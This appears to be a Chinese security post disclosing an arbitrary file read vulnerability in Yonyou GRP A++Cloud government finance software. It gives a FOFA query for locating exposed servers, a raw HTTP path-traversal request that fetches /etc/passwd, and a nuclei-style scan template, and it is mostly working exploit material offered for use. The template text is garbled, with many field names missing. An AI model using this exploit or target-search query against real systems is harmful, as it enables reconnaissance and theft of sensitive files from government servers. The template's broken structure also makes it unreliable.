请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
用友GRP A++Cloud 政府财务云 任意文件读取漏洞,攻击者可利用此漏洞收集敏感信息,从而为下一步攻击做准备。
fofa语法:body="/pf/portal/login/css/fonts/style.css"
POC:GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1Host: x.x.x.xCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMTConnection: close
id: yongyou_grpa_cloud_filereadinfo:name: yongyou_grpa_cloud_filereadauthor: recjlseverity: mediumdescription: descriptionmetadata:: 1verified: true: body="/pf/portal/login/css/fonts/style.css"tags: fileread,yongyou,hwrequests:raw:|+GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1Host: {{Hostname}}: max-age=0: 1: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: gzip, deflate, br: zh-CN,zh;q=0.9Cookie: JSESSIONID=D32BAA39CE141CA6077FF7FF12F03B1C: Wed, 11 Oct 2023 05:16:05 GMTConnection: close: andmatchers:type: wordpart: bodywords:root:x:0:0:root:/root:/bin/bashtype: statusstatus:200
